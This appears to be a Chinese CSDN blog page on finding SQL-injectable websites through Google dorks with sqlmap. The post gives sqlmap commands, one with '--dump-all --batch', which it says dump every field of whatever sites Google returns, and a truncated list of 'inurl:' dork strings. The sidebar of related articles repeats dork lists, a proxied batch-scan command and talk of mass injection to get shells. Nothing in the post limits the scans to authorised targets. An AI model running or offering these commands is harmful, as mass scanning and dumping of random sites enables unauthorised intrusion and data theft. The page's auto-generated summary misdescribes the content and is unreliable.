注入点之Google搜索(附关键字)

最新推荐文章于 2023-04-29 16:32:17 发布
最新推荐文章于 2023-04-29 16:32:17 发布
阅读量2.6k 收藏 10
点赞数 1
分类专栏: SQLMAP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42452926/article/details/104799479
版权
本文深入探讨了Google搜索引擎中的注入点,揭示了如何通过巧妙利用这些点获取未公开信息。介绍了常见的搜索语法和高级搜索技巧,帮助读者提升信息搜集能力。同时,讨论了可能的安全风险及防范措施。
摘要由CSDN通过智能技术生成 

利用Google Dorks字符串找到可注入的网站

sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)

使用示例:
1.
sqlmap.py -g "inurl:php?id="

2.
sqlmap.py -g "inurl:php?id=" --dump-all --batch

          google搜索注入点 自动跑出所有字段


部分关键字(根据自己需要的去使用):
inurl:item_id=	
inurl:review.php?id=	
inurl:hosting_info.php?id=
inurl:newsid=	
inurl:iniziativa.php?in=	
inurl:gallery.php?id=
inurl:trainers.php?id=	
inurl:curriculum.php?id=	
inurl:rub.php?idr=
inurl:news-full.php?id=	
inurl:labels.php?id=	
inurl:view_faq.php?id=
inurl:news_display.php?getid=	
inurl:story.php?id=	
inurl:artikelinfo.php?id=
inurl:index2.php?option=	
inurl:look.php?ID=	
inurl:detail.php?ID=
inurl:readnews.php?id=	
inurl:newsone.php?id=	
inurl:index.php?=
inurl:top10.php?cat=	
inurl:aboutbook.php?id=	
inurl:profile_view.php?id=
inurl:newsone.php?id=	
inurl:material.php?id=	
inurl:cat
最低0.47元/天 解锁文章
怪獸哪裡跑
关注
专栏目录
SQL注入
weixin_30629977的博客
09-05 1873
SQL注入 如果要对一个网站进行SQL注入攻击,首先就需要到存在SQL注入漏洞的地方,也就是寻所谓的注入。可能的SQL注入一般存在于登录页面、查页面或添加页面等用户可以查或修改数据的地方。   最常用的寻SQL注入的方法,是在网站中寻如下形式的页面链接:http://www.xxx.com/xxx.asp?id=YY ...
啊D注入关键字
03-14
啊D注入关键字,最全关键字
SQL注入搜索关键字
weixin_34355881的博客
03-15 1578
注入关键字个人从网上和一些教程钟归纳了一些批量搜索注入关键字,分享给大家使用,有些关键字还可以扩展,寻注入靠的不是其他,就是自己的想象力!下面的关键字可以随意组合。NewsInfo.asp?id=otherinfo.asp?id=info.asp?id=news_show.asp?id=showhf.asp?id=detailshow.asp?ID...
python注入_利用Python脚本通过搜索引擎批量寻利用注入
weixin_39857876的博客
12-21 222
思路 :利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入检测分为三步 :URL采集对采集到的不可能的URL进行过滤 , 例如静态的页面等注入检测参考资料 :实现 :URL采集 :利用Bing提供的免费API , 进行URL采集 : (Bing.py)#!/usr/bin/env python#coding:utf8import requestsimpor...
google 搜索sql注入
weixin_33810006的博客
10-15 940
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL注入搜索关键字.doc
06-12
以下是一些用于搜索可能存在的SQL注入关键字和表达式,这些关键字通常与特定的网页结构或参数相关联: 1. `inurl:`:这个关键词用于在Google搜索中限定URL包含某个字符串,如`inurl:asp?=数字`,表示查URL中...
利用谷歌搜索SQL注入漏洞关键词
12-16
利用谷歌搜索SQL注入漏洞关键词 目标关键字+inurl:id 英语字母及单词+inurl:id 网站域名+inurl:id 阿拉伯数字+inurl:id inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct....
渗透测试之Google搜索语法
m0_48867141的博客
02-27 994
intitle 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle 例如: intitle:谷歌搜索语法 allintitle: 如果你觉得结果不满意,需要添加关键字,那么可以这样 allintitle:谷歌搜索语法 渗透测试 或者 intitle:谷歌搜索语法 intitle:渗透测试 inurl 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl 例如:inurl:free ..
谷歌注入搜索
热门推荐
血色苍穹
11-02 2万+
nurl:asp?id= inurl:Article_Print.asp? inurl:EnCompHonorBig.asp?id=随便加个数字 inurl:showproduct.asp?id=随便加个数字 inurl:ManageLogin.asp inurl:EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字) inu...
整理出来的SQL注入关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
百度批量注入拿shell
05-22
百度批量注入拿shell
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
我的注入关键字
Ming
02-25 3246
注入 关键字 inurl:CompHonorBig.asp?id= Article_print.asp?ArticleID= inurl:conpany.asp?id= inurl:products.asp?id= inurl:newsSHOw.asp?id= inurl:(asp=XXX?)  site:jp搜索日本网站 inurl:asp?id=  cat.asp?cat
php常用的关键字,PHP注入常用关键字
weixin_30480281的博客
03-21 499
inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:pageid=inurl:games.php?id=inurl:page.php?file=inurl:...
Sqmap 利用 Google 批量扫描注入
tomyyyyy
04-13 2471
Sqmap 利用 Google 批量扫描注入 sqlmap -g "inurl:php?id=10 site:.com.cn" --proxy "http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart -g #谷歌搜索 –pr...
mysql注入关键字_Mysql注入在limit关键字后面的利用方法
weixin_35249119的博客
01-19 275
Post Views:5,294描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。细节在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:SELECTfieldFROMtableWHEREid>0ORDERBYidLIMIT【注入】问题的关键在于...
sql注入攻击中常用的几个关键字
liweibin812的博客
02-27 4917
在sql注入漏洞查询中,当验证有SQL注入存在时,我们需要进一步验证该漏洞的危害性,需要使用到一些高级手段来拿到数据库中的一些关键字段甚至是整个数据库权限。下面是一些常用的sql注入攻击关键字。 union关键字:是将多个select 查询语句的结果组合到一个结果集中,没列的数据类型必须相同。 information_schema.schemata :提供了数据库相关的信息 (1)查询用户数...
SQL注入基础
m0_73477772的博客
04-29 2138
SQL注入基础
油猴 JS 替换网页关键字
最新发布
06-30
油猴 (User JavaScript) 是一种浏览器扩展技术,它允许用户在网页上运行自定义的 JavaScript 代码,从而实现对网页内容的动态修改或扩展。如果你想用油猴替换网页上的关键字,你可以使用以下步骤: 1. 创建一个新的油猴脚本:首先,你需要在浏览器支持油猴的环境中(如Chrome或Firefox)创建一个`.user.js` 或 `.js` 文件。 2. 注入代码:在脚本中添加JavaScript代码,通常使用 `document.querySelectorAll()` 或其他DOM操作方法来选择你要替换的关键字元素。例如: ```javascript // 选择所有包含关键字的元素 const elements = document.querySelectorAll('span[contains(text(), "原关键字")]'); // 替换关键字 elements.forEach(element => { element.textContent = element.textContent.replace('原关键字', '替换后的新词'); }); ``` 3. 安装和启用脚本:将脚本文件保存到扩展数据目录(通常是`%APPDATA%\Google\Chrome\User Data\Default\Extensions` 或 `~/.mozilla/firefox/userContent`),然后在浏览器的扩展管理界面安装并启用它。 4. 自定义触发条件:你还可以设置特定的触发事件或网页URL来只在满足条件时应用替换。 注意,这只是一个基本示例,实际使用可能需要根据目标网站的具体结构进行调整。同时,频繁修改网页内容可能违反某些网站的服务条款,所以在使用油猴之前,请确保你的行为符合网站的规定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值